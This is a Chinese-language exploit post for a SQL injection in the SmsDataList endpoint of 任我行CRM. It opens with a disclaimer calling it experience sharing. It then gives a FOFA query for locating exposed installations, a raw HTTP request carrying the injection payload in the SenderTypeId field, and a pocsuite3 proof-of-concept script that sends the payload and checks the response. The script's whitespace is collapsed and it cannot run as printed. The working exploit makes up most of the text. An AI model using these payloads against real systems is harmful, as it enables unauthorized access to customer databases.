免责声明
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责
漏洞描述
系统SmsDataList接口存在SQL注入漏洞
fofa语句
"欢迎使用任我行CRM"
poc加检测
POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencodedKeywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI
poc脚本
脚本使用pocsuite框架
# _*_ coding:utf-8 _*_
# @Time : 2024/1/3from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_strclass rwx_crm_smsdatalist_sql(POCBase):pocDesc = '''任我行CRM系统SmsDataList接口SQL注入漏洞'''author = '炼金术师诸葛亮'createDate = '2024-01-03'name = '任我行CRM系统SmsDataList接口SQL注入漏洞'def _verify(self):result = {}path = """/SMS/SmsDataList/?pageIndex=1&pageSize=30"""headers = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)","Accept": "*/*","Content-Type": 'application/x-www-form-urlencoded','Connection': 'Keep-Alive'}url = self.url + pathdata = "Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI"try:response = requests.post(url, headers=headers, data=data, verify=False)if response.status_code == 200 and 'dc3949ba59ab' in response.text:result['VerifyInfo'] = {}return self.parse_output(result)except Exception as e:passregister_poc(rwx_crm_smsdatalist_sql)
脚本利用